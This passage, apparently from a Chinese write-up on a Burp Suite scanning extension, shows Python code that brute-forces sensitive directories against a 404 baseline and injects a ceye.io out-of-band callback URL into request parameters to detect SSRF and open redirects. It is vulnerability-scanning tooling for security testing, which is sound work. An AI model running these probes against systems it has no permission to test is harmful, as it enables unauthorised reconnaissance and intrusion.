首先请求一个肯定不存在的路径，记录其 404 页面的状态码和响应包大小作为基线；然后逐个请求字典中的目录，根据响应状态码判断是否为敏感目录（状态码判断逻辑参考李姐姐的 bbscan）。为了过滤"软 404"（任何路径都返回 200 的站点），还要求扫描页面与 404 页面的响应大小之差大于 50 字节，这个阈值可以按目标动态调整。
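def lfiDir(self, request, protocol, host, port, ishttps, url, html404_status, html404_content, size_threshold=50):
    """Probe ``url`` for sensitive directories using the ``self.fuzzLFI.dir2`` wordlist.

    Each wordlist entry is appended verbatim to ``url`` (no ``/`` is inserted, so
    ``url`` must already end with the right separator) and replayed through Burp.
    A candidate is reported -- printed and handed to ``self.save`` -- when any of
    these holds:

    * the response body matches ``self.fuzzLFI.errorFlag`` (presumably a compiled
      regex of LFI / path-disclosure error strings), or
    * the status code is 206, or
    * the status is 200, 301 or 302 AND the body length differs from the 404
      baseline by more than ``size_threshold`` bytes (bbscan-style filter for
      sites that answer every path with a "soft 404").

    Scanning stops at the first hit, as in the original implementation, so a
    target with several sensitive directories yields only one finding per call.

    Args:
        request: original Burp request. Not used by this method; kept for
            signature parity with the other fuzzers.
        protocol, host, port, ishttps: target connection details forwarded to
            ``makeHttpRequest`` and ``get_request_url``.
        url: base URL the wordlist entries are appended to.
        html404_status: status code of the 404 baseline. Currently not consulted;
            only the baseline body size takes part in the decision.
        html404_content: body of the 404 baseline response.
        size_threshold: minimum absolute difference (bytes) between a candidate's
            response length and the baseline length before a 200/301/302 counts
            as a real page. Defaults to 50; raise it on noisy targets.
    """
    # Hoisted out of the loop: the baseline does not change between candidates.
    baseline_len = len(html404_content)
    for candidate in self.fuzzLFI.dir2:
        # URL is java.net.URL under Jython, imported elsewhere in the file.
        new_request = self._helpers.buildHttpRequest(URL(url + candidate))
        new_response = self._callbacks.makeHttpRequest(host, port, ishttps, new_request)
        _, req_headers, req_body, _, _ = self.get_request_info(new_request)
        _, res_body, status, res_len = self.get_response_info(new_response)

        error_hits = self.fuzzLFI.errorFlag.findall(res_body)
        # 301/302 are kept because a redirect to a login/index page is still
        # evidence that the directory exists; the size check weeds out soft 404s.
        size_differs = abs(res_len - baseline_len) > size_threshold
        looks_like_page = status in (200, 301, 302) and size_differs
        if not (error_hits or status == 206 or looks_like_page):
            continue

        req_url = self.get_request_url(protocol, req_headers, host, port)
        content = '[+]{} ->{} {} [Headers] -> {} [Bodys] -> {}'.format(
            '[DIR GET]', error_hits, req_url, req_headers, req_body)
        print(content)
        self.save(content + ' ')
        print('-' * 50)
        break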
2.3
XXE 和 SSRF 的 HTTP 协议检测使用 ceye.io、dnslog.io 这类带外（OOB）平台：在 payload 中嵌入带唯一标记的回连域名，发包后调用平台的 API 接口查询是否产生了对应的 DNS/HTTP 记录，有记录即说明目标主动发起了外连。
SSRF 代码示例。这里把 URL 跳转（开放重定向）的检测也放在了 SSRF 判断里：如果注入的 URL 原样出现在响应头（如 Location）中且状态码相对原始请求发生了变化，就报告为 URL 跳转。
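def ssrfHttp(self, request, protocol, host, port, ishttps, parameterName, parameterValue, parameterType, ResStatusCode, oob_domain='m4mta5.ceye.io'):
    """Test one request parameter for SSRF (out-of-band) and open redirect.

    The parameter is replaced with an HTTP URL under ``oob_domain``.  Both the
    hostname (``<host>.<oob_domain>``) and the path (``<host><parameterName>``
    plus a fixed marker) embed the target, so a record on the OOB platform can be
    attributed to this request.  After replaying the request, the platform's
    record list (``self.ceyeFin()``) is searched for the marker; a match means the
    server fetched our URL and is reported as ``[SSRF GET]``.  Independently, if
    the injected URL is reflected in the response headers (e.g. ``Location``) and
    the status code differs from ``ResStatusCode``, it is reported as
    ``[URL GET]`` (open redirect).

    Args:
        request: Burp request bytes to mutate.
        protocol, host, port, ishttps: target connection details.
        parameterName: name of the parameter to inject into.
        parameterValue: original value. Unused; kept for signature parity.
        parameterType: Burp parameter type passed to ``buildParameter``.
        ResStatusCode: status code of the unmodified request; a changed status
            is part of the open-redirect heuristic.
        oob_domain: OOB platform domain the callback is sent to. Defaults to the
            author's ceye.io identifier; override it with your own.

    Findings are printed and passed to ``self.save``; nothing is returned.
    """
    marker = host + parameterName + "testssrf1234567890"
    payload = 'http://' + host + '.' + oob_domain + '/' + marker
    new_param = self._helpers.buildParameter(parameterName, payload, parameterType)
    new_request = self._helpers.updateParameter(request, new_param)
    new_response = self._callbacks.makeHttpRequest(host, port, ishttps, new_request)
    _, req_headers, req_body, _, _ = self.get_request_info(new_request)
    res_headers, _, res_status, _ = self.get_response_info(new_response)

    # NOTE(review): the OOB log is polled immediately after the request. A
    # server that fetches the URL asynchronously may not have hit it yet, so a
    # miss here is not proof of "no SSRF" -- consider re-querying later.
    records = self.ceyeFin()
    # Plain substring match on purpose: host and parameter names routinely
    # contain regex metacharacters ('.', 'ids[]'), which made the original
    # un-escaped re.compile() either over-match or raise re.error.
    if marker in records:
        req_url = self.get_request_url(protocol, req_headers, host, port)
        content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format(
            '[SSRF GET]', req_url, req_headers, req_body)
        print(content)
        self.save(content + ' ')
        print('-' * 50)

    # Open redirect: our full URL echoed in a header (Location) with a new status.
    reflected = payload in "".join(res_headers)
    if reflected and res_status != ResStatusCode:
        req_url = self.get_request_url(protocol, req_headers, host, port)
        content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format(
            '[URL GET]', req_url, req_headers, req_body)
        print(content)
        self.save(content + ' ')
        print('-' * 50)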
4、展示效果
SSRF file 协议、DirScan（目录扫描）